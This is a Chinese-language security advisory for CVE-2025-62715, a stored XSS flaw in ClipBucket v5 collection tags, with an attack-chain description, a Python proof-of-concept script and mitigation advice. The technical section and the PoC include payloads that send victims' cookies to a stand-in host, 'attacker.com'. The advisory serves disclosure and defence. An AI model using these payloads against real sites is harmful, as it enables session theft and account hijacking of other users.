CVE-2025-62715 ClipBucket v5收藏标签功能存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62715

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

ClipBucket v5

漏洞概述

CVE-2025-62715是ClipBucket v5开源视频分享平台中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于ClipBucket的收藏标签(Collection Tags)功能中，影响版本5.5.2-#147及以下版本。攻击者可以通过创建一个包含恶意HTML或JavaScript代码的标签，当其他用户访问收藏详情页或标签列表页时，这些恶意代码会被浏览器执行，从而窃取用户会话Cookie、劫持用户账户或进行其他恶意操作。由于是存储型XSS，恶意脚本会持久保存在服务器端，所有访问受影响页面的用户都会受到攻击。该漏洞需要攻击者具有低权限的认证用户身份，但不需要特殊权限即可实施攻击。攻击成功后可能影响所有查看受影响页面的用户，造成机密信息和用户隐私的泄露。

技术细节

漏洞根源在于ClipBucket v5的收藏标签功能对用户输入未进行充分的输入验证和输出编码。攻击者以低权限认证用户身份登录系统后，可以在创建收藏标签时注入恶意的HTML或JavaScript代码。例如，攻击者可以构造如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>等Payload。当其他用户访问包含该标签的收藏详情页(collection detail page)或标签列表页(tag-list page)时，服务器从数据库中取出存储的标签内容并直接输出到HTML页面中，由于缺少必要的HTML实体编码或输出过滤，浏览器会将恶意代码作为正常脚本执行。攻击者可以利用此漏洞窃取受害者的认证令牌、修改页面内容进行钓鱼攻击、或在用户浏览器中执行任意JavaScript代码。修复版本5.5.2-#152通过添加输入过滤和输出编码解决了此问题。

攻击链分析

STEP 1

步骤1

攻击者以低权限认证用户身份登录ClipBucket v5平台

STEP 2

步骤2

攻击者访问收藏标签创建功能，构造包含恶意JavaScript代码的标签名称

STEP 3

步骤3

恶意标签被存储到数据库中，未经过滤或编码处理

STEP 4

步骤4

受害者访问收藏详情页或标签列表页，服务器从数据库取出标签内容并直接输出到HTML

STEP 5

步骤5

受害者浏览器解析HTML页面时，恶意JavaScript代码被执行，窃取Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-62715 PoC - ClipBucket v5 Stored XSS in Collection Tags
# Target: ClipBucket v5 <= 5.5.2-#147

BASE_URL = "http://target-clipbucket.com"
LOGIN_URL = f"{BASE_URL}/login"
CREATE_TAG_URL = f"{BASE_URL}/collections/create_tag"
VIEW_COLLECTION_URL = f"{BASE_URL}/collections/view"

session = requests.Session()

# Step 1: Authenticate as low-privilege user
login_data = {
    "username": "attacker_user",
    "password": "attacker_password"
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Create malicious tag with XSS payload
# Payload: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"
tag_data = {
    "tag_name": xss_payload,
    "collection_id": 123
}
response = session.post(CREATE_TAG_URL, data=tag_data)

# Step 3: When victim views collection or tag list, XSS executes
print("XSS tag created successfully")
print(f"Victim visits: {VIEW_COLLECTION_URL}?id=123")
print("Malicious JavaScript will execute in victim's browser")

影响范围

ClipBucket v5 <= 5.5.2-#147

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙(WAF)上配置规则，过滤包含<script>、<img>、<svg>等危险HTML标签的请求参数。限制低权限用户创建标签的功能权限，直到完成版本升级。建议管理员审查数据库中已存在的标签内容，清除潜在的恶意代码。